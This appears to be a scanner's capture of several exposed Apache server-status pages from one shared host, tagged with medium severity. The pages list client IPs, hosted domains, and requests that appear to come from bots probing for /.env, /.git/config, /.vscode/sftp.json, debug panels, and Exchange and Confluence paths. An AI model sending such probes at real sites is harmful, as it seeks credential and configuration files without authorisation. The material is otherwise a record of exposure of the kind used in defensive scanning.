Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 02-Feb-2024 16:22:06 CET Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 10 Parent Server MPM Generation: 9 Server uptime: 2 days 5 hours 39 minutes 7 seconds Server load: 0.03 0.03 0.00 Total accesses: 66479 - Total Traffic: 2.0 GB - Total Duration: 27705287 CPU Usage: u66.04 s53.29 cu266.16 cs189.38 - .298% CPU load .344 requests/sec - 10.7 kB/second - 31.0 kB/request - 416.752 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02904681no0yes010000 12904814no1yes19000 22904682no0yes010000 32904683no0yes010000 42904684no1yes010000 Sum502 149000 _______________W__________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-929046810/101/1057_ 17.49105114880.03.2034.17 139.144.150.205http/1.1 0-929046810/99/929_ 17.36002743620.01.7917.28 103.67.163.199http/1.1 0-929046810/109/980_ 17.53144809175070.020.7834.43 172.69.33.217h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-929046810/102/978_ 17.521448010959180.06.3322.58 172.69.34.27h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-929046810/126/1132_ 18.06016294320.03.1450.22 139.144.150.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-929046810/113/1104_ 17.53144704507340.03.4050.52 172.69.33.63h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-929046810/93/1030_ 17.53144804258220.02.5142.28 172.69.33.187h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-929046810/99/963_ 17.53144707018960.015.5527.71 172.69.33.57h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-929046810/148/1161_ 17.521448055857950.04.9341.80 172.70.214.172h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-929046810/113/1131_ 17.52144804411070.03.5648.51 172.69.33.67h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-929048140/361/1897_ 25.802318012700.020.1462.33 172.71.186.249h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-929048140/343/1974_ 25.644705692980.09.2668.48 172.70.82.177h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-929048140/381/1886_ 25.851810374837990.010.1336.94 172.71.30.196h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-929048140/306/2011_ 25.8723157031150.017.9048.73 172.71.134.163h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-929048140/283/1773_ 25.85186276167530.021.0182.11 172.69.71.117h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-929048140/303/1858W 25.78004222690.08.5473.50 139.144.150.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-929048140/421/2024_ 25.6216124690420.018.6366.68 139.144.150.205http/1.1 1-929048140/348/2056_ 25.771135564180.05.3133.12 139.144.150.205h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-929048140/377/1969_ 25.89114799590.05.9432.05 139.144.150.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-929048140/320/1918_ 25.81110026858830.08.2244.16 172.70.91.143h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-929046820/249/1031_ 21.5761902598650.04.5018.01 198.41.224.178h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-929046820/268/985_ 21.71122226660.04.5649.67 139.144.150.205http/1.1 2-929046820/269/1154_ 21.54102653260.016.7138.52 139.144.150.205h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-929046820/363/1331_ 22.026241442756450.06.4851.42 172.71.103.28h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-929046820/170/1156_ 22.01102551830.015.7935.21 139.144.150.205http/1.1 2-929046820/164/1212_ 21.726211962723560.02.9818.38 172.69.34.16h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-929046820/247/1217_ 21.36106092940.05.3750.57 139.144.150.205http/1.1 2-929046820/191/1008_ 21.29621172585490.03.6029.57 164.90.205.35http/1.1pre.relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-929046820/200/1107_ 22.0555003992480.06.5425.42 40.77.190.75h2barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-929046820/228/1158_ 21.6561902467820.07.5574.58 172.70.185.148h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-929046830/238/1299_ 20.34003375140.04.2540.23 139.144.150.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-929046830/147/1249_ 20.34003069700.015.4931.70 139.144.150.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-929046830/365/1428_ 20.096233492986450.05.5924.38 141.101.76.47h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-929046830/128/1205_ 19.7561302881480.02.0935.35 172.70.42.199h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-929046830/276/1337_ 19.7062362971870.04.2921.12 172.69.33.111h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-929046830/175/1218_ 20.1555003055810.014.3546.35 40.77.189.55h2barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-929046830/161/1210_ 19.57103125560.03.4246.70 139.144.150.205h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-929046830/149/1336_ 20.1011703280860.02.8937.76 139.144.150.205h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-929046830/171/1225_ 20.116182062913450.04.7737.50 172.64.236.130h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-929046830/120/1158_ 19.6961303990840.02.3338.17 172.69.34.104h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-929046840/234/1273_ 19.5219685393640.02.3549.02 139.144.150.205h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-929046840/194/1224_ 19.5804166604520.05.9529.67 172.71.150.168h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-929046840/244/1289_ 19.5822124047570.03.5823.38 108.162.245.43h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-929046840/250/1427_ 19.75003348600.04.0822.86 139.144.150.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-929046840/194/1318_ 19.58004163850.016.4138.49 172.71.186.77h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-929046840/143/1114_ 19.75004879990.03.0820.70 139.144.150.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-929046840/138/1383_ 19.57204040250.03.5435.59 172.70.82.199
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e321de696e
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 07-Jan-2024 10:40:39 CET Restart Time: Friday, 29-Dec-2023 10:21:12 CET Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 9 days 19 minutes 26 seconds Server load: 0.19 0.12 0.04 Total accesses: 255671 - Total Traffic: 4.5 GB - Total Duration: 102326001 CPU Usage: u21.85 s29.92 cu1224.96 cs867.57 - .275% CPU load .328 requests/sec - 6.0 kB/second - 18.3 kB/request - 400.225 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01590457no1yes19000 11590326no0yes010000 21590324no4yes19011 31590325no0yes010000 41590327no0yes010000 Sum505 248011 ________R_________________W_______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-5415904570/3/5968_ 0.0502028386450.00.02104.08 161.35.190.56http/1.1 0-5415904570/5/5840_ 0.080015387170.00.01105.48 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-5415904570/2/5984_ 0.06214413485350.00.0196.69 161.35.190.56h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-5415904570/3/6225_ 0.082027060620.00.00136.68 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-5415904570/7/6063_ 0.080016157070.00.0286.38 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-5415904570/3/5631_ 0.080020528760.00.0191.98 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 0-5415904570/3/6273_ 0.032029279630.00.01105.25 142.93.153.3http/1.1relehse.com:80GET /v2/_catalog HTTP/1.1 0-5415904570/5/6104_ 0.080012468670.00.02116.89 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-5415904570/3/5915R 0.05291821182850.00.0188.25 143.110.218.229http/1.1relehse.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-5415904570/2/5845_ 0.0502113110230.00.0168.86 143.110.218.229http/1.1relehse.com:443GET /telescope/requests HTTP/1.1 1-5415903260/4/6597_ 0.038016388400.00.0175.90 164.90.184.41http/1.1 1-5415903260/3/6265_ 0.058024431620.00.02118.53 164.90.184.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-5415903260/2/6504_ 0.0325012527740.00.01172.51 157.230.54.29http/1.1 1-5415903260/2/6499_ 0.060021426390.00.00111.69 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-5415903260/4/6624_ 0.061019180740.00.0299.31 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 1-5415903260/2/6685_ 0.032519104490.00.0394.44 161.35.190.56h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-5415903260/1/6407_ 0.023021216270.00.0076.21 161.35.190.56http/1.1 1-5415903260/2/6548_ 0.033011574420.00.00109.81 161.35.190.56h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-5415903260/3/6828_ 0.061017588160.00.01120.04 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-5415903260/3/6787_ 0.0328111097470.00.03116.86 205.169.39.151http/1.1relehse.com:443GET /admin_layout/assets/js/libs/lodash.compat.min.js HTTP/1.1 2-5415903240/35/4937_ 0.102017357060.00.1873.94 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-5415903240/1/4914_ 0.05109551530.00.0180.43 157.230.54.29http/1.1 2-5415903240/5/4484_ 0.100010440990.00.0394.80 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 2-5415903240/2/4646_ 0.101030221210.00.0184.71 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-5415903240/3/4599_ 0.110011208030.00.00111.83 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 2-5415903240/3/4330_ 0.093028943630.00.0173.69 161.35.190.56http/1.1 2-5415903240/2/4467W 0.090016656940.00.0084.23 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-5415903240/5/4486_ 0.10181322095280.00.0494.30 172.71.146.74h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5415903240/2/4686_ 0.092025327500.00.0187.13 161.35.190.56http/1.1 2-5415903240/1/4641_ 0.0531521304230.00.0174.54 207.154.240.169http/1.1relehse.com:443GET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 3-5415903250/2/3686_ 0.013026780750.00.0169.13 161.35.190.56h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-5415903250/1/3611_ 0.00332720809860.00.0052.93 154.28.229.252http/1.1 3-5415903250/3/3744_ 0.05321821242840.00.0268.78 143.110.218.229http/1.1relehse.com:443GET /login.action HTTP/1.1 3-5415903250/2/3906_ 0.03321641184570.00.0264.33 207.154.240.169http/1.1relehse.com:443GET /telescope/requests HTTP/1.1 3-5415903250/3/3897_ 0.0331020710930.00.0167.09 142.93.153.3http/1.1relehse.com:80GET /.env HTTP/1.1 3-5415903250/2/3658_ 0.04291512129560.00.0253.50 143.110.218.229http/1.1relehse.com:443GET /about HTTP/1.1 3-5415903250/2/3903_ 0.0331424008200.00.0485.95 154.28.229.252http/1.1relehse.com:443GET /admin_layout/assets/js/libs/jquery-1.10.2.min.js HTTP/1.1 3-5415903250/2/3901_ 0.0232014610370.00.0181.46 154.28.229.252http/1.1 3-5415903250/0/3783_ 0.00252835504850.00.0052.97 157.230.54.29h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-5415903250/3/3732_ 0.061015656600.00.0149.02 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-5415903270/1/4887_ 0.0023023241390.00.0095.70 205.169.39.151http/1.1 4-5415903270/3/4629_ 0.090029661780.00.0188.53 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-5415903270/1/4877_ 0.01241512910750.00.0199.71 205.169.39.151http/1.1done, streams: 0/32/32/0/0 (open/recv/resp/push/rst) 4-5415903270/2/4445_ 0.010032791740.00.01140.47 157.230.54.29h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-5415903270/4/4651_ 0.091023771540.00.0585.78 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-5415903270/6/4326_ 0.062010646710.00.00108.99 161.35.190.56http/1.1 4-5415903270/31/4651_ 0.09431611581790.00.1490.99 172.71.142.180h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5415903270/1/4374_ 0.0011646878680.00.0195.74 157.230.54.29http/1.1 4-5415903270/3/4588_ 0.091016244160.0</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e35e773ca6
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 07-Jan-2024 03:53:57 CET Restart Time: Friday, 29-Dec-2023 10:21:12 CET Parent Server Config. Generation: 47 Parent Server MPM Generation: 46 Server uptime: 8 days 17 hours 32 minutes 44 seconds Server load: 0.09 0.10 0.05 Total accesses: 253170 - Total Traffic: 4.4 GB - Total Duration: 90702369 CPU Usage: u22.54 s30.56 cu1197.48 cs841.05 - .277% CPU load .336 requests/sec - 6.1 kB/second - 18.2 kB/request - 358.267 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01576119no0yes010000 11576120no0yes010000 21576118no0yes19000 31576256no0yes010000 41576285no0yes010000 Sum500 149000 ____________________W_____________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4615761190/2/5955_ 0.3396457628356540.00.05104.00 172.69.70.247h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4615761190/0/5828_ 0.00959015381500.00.00105.44 172.70.134.10h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4615761190/0/5970_ 0.00959013444640.00.0096.59 20.165.28.192http/1.1relehse.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4615761190/0/6209_ 0.00959027037530.00.00136.57 172.70.42.108h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4615761190/2/6047_ 0.34924016138310.00.0386.26 17.246.23.97http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/ginger/front/css/cookies-enabler-dialog 0-4615761190/2/5616_ 0.34922120518210.00.0191.85 17.246.23.97http/1.1barrerasdecontencion.com:443GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP 0-4615761190/0/6257_ 0.00917129259470.00.00105.15 20.165.28.192http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4615761190/0/6091_ 0.00917012455510.00.00116.78 172.70.34.124h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4615761190/0/5897_ 0.0011514021147680.00.0087.91 20.165.28.192http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4615761190/0/5836_ 0.001151013093700.00.0068.78 20.165.28.192http/1.1 1-4615761200/1/6581_ 0.291156016372790.00.0075.82 172.71.186.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4615761200/0/6252_ 0.00115690824431260.00.00118.46 172.71.219.108h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4615761200/0/6493_ 0.00191596912506460.00.00172.44 45.79.168.172http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4615761200/0/6488_ 0.001151021425070.00.00111.45 167.94.145.58http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4615761200/0/6607_ 0.001151019174760.00.0099.27 172.70.35.57h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4615761200/0/6674_ 0.001151019101690.00.0094.33 20.165.28.192http/1.1relehse.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4615761200/1/6392_ 0.660021180150.00.0076.11 164.90.205.35http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-4615761200/0/6537_ 0.000111555740.00.00109.76 167.94.145.58http/1.1 1-4615761200/0/6811_ 0.001915017587980.00.00119.95 192.185.2.147h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-4615761200/0/6771_ 0.001915011071910.00.00116.73 167.94.145.58h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-4615761180/0/4882W 0.000017313650.00.0073.38 164.90.205.35http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-4615761180/1/4891_ 0.3301979503140.00.0080.06 172.71.186.178h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4615761180/1/4459_ 0.44023510412120.00.0093.56 172.71.147.158h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4615761180/3/4626_ 0.820030163790.00.0084.31 164.90.205.35http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-4615761180/1/4577_ 0.430611149560.00.03111.59 164.90.205.35h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-4615761180/2/4307_ 0.430128865240.00.0173.47 164.90.205.35h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-4615761180/0/4450_ 0.009091916620450.00.0084.04 20.165.28.192h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4615761180/0/4468_ 0.00910022043940.00.0093.92 167.94.145.58http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4615761180/0/4667_ 0.0091594225290410.00.0086.99 172.71.159.41h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4615761180/0/4622_ 0.000121285190.00.0074.41 164.90.205.35http/1.1 3-4615762560/6/3597_ 0.800022099810.00.1767.97 164.90.205.35http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-4615762560/7/3526_ 0.76091615522150.00.1050.51 164.90.205.35http/1.1 3-4615762560/5/3650_ 0.758375217840280.00.0366.10 172.70.115.98h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4615762560/4/3817_ 0.800029536260.00.0360.58 164.90.205.35http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-4615762560/6/3813_ 0.7602318485050.00.0466.25 164.90.205.35http/1.1 3-4615762560/4/3567_ 0.625038811221650.00.0550.98 172.69.58.133h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4615762560/6/3818_ 0.69152118548740.00.0484.27 164.90.205.35h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-4615762560/3/3814_ 0.69502811924440.00.2879.57 162.158.22.186h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-4615762560/5/3688_ 0.72832426302430.00.1052.12 172.71.186.230h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4615762560/3/3650_ 0.77513713038890.00.0347.92 51.178.207.154h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4615762850/6/4796_ 0.77124622191140.00.0293.13 164.90.205.35h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-4615762850/4/4517_ 0.51126012196870.00.0484.87 164.90.205.35h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-4615762850/8/4785_ 0.74172312512310.00.7992.15 172.70.131.187h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4615762850/9/4336_ 0.871131006350.00.06138.42 164.90.205.35http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-4615762850/4/4542_ 0.600122123288970.00.1773.47 164.90.205.35http/1.1 4-4615762850/3/4186_ 0.360499502590.00.01106.43 164.90.205.35http/1.1 4-4615762850/8/4517_ 0.88009711590.00.1089.38 164.90.205.35http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3d6679d4c
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 05-Jan-2024 19:55:34 CET Restart Time: Friday, 29-Dec-2023 10:21:12 CET Parent Server Config. Generation: 39 Parent Server MPM Generation: 38 Server uptime: 7 days 9 hours 34 minutes 22 seconds Server load: 0.08 0.04 0.01 Total accesses: 235261 - Total Traffic: 4.1 GB - Total Duration: 83978093 CPU Usage: u37.51 s41.39 cu1050.94 cs713.75 - .288% CPU load .368 requests/sec - 6.7 kB/second - 18.3 kB/request - 356.957 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01507115no1yes010000 11507244no0yes010000 21507114no0yes010000 31507112no0yes010000 41507113no0yes19000 Sum501 149000 ____________________________________________W_____ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3815071150/135/5566_ 8.620027676730.01.4297.57 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-3815071150/126/5427_ 8.4626014525140.01.74100.69 172.71.150.153h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3815071150/125/5562_ 8.332559412676790.01.0490.30 172.69.64.145h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3815071150/135/5786_ 8.2426026091470.00.62130.06 162.158.82.135h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3815071150/142/5660_ 8.621115422970.01.9381.84 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-3815071150/131/5189_ 8.620019721470.01.5076.28 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-3815071150/157/5867_ 8.29075428320670.01.20100.24 64.227.126.135http/1.1 0-3815071150/135/5673_ 8.47167311735260.00.59113.00 172.64.238.7h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3815071150/150/5516_ 8.60093220419030.01.2082.55 172.70.130.186h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3815071150/145/5417_ 7.9025012078050.00.9665.52 39.108.98.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3815072440/132/6147_ 7.05295014918480.01.0671.30 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 1-3815072440/139/5838_ 7.19754014786330.013.66114.20 39.108.98.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-3815072440/136/6083_ 7.20295011077200.00.55166.24 39.108.98.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3815072440/138/6089_ 7.420020103580.00.6090.44 162.158.82.142h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-3815072440/130/6224_ 6.79753017818350.00.3893.79 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-3815072440/137/6255_ 7.710017508690.01.5474.83 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3815072440/133/5981_ 7.59300019735050.01.3668.93 172.64.238.56h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3815072440/127/6078_ 7.0030094410023690.00.77103.26 172.71.154.224h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3815072440/139/6401_ 7.420516019980.01.09112.34 64.227.126.135http/1.1 1-3815072440/134/6322_ 7.71019408460.01.20112.74 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-3815071140/46/4325_ 5.7070725615981390.00.9766.38 162.158.129.133h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/50/4470_ 5.6775208098100.00.3073.77 162.158.82.140h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/50/4025_ 5.3028808676730.00.2681.10 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/58/4220_ 5.8529381928671990.00.6676.11 162.158.167.70h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/42/4100_ 5.6775309729960.01.19103.09 162.158.82.130h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-3815071140/52/3849_ 4.90288027452770.00.3966.65 172.71.218.153h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/45/4008_ 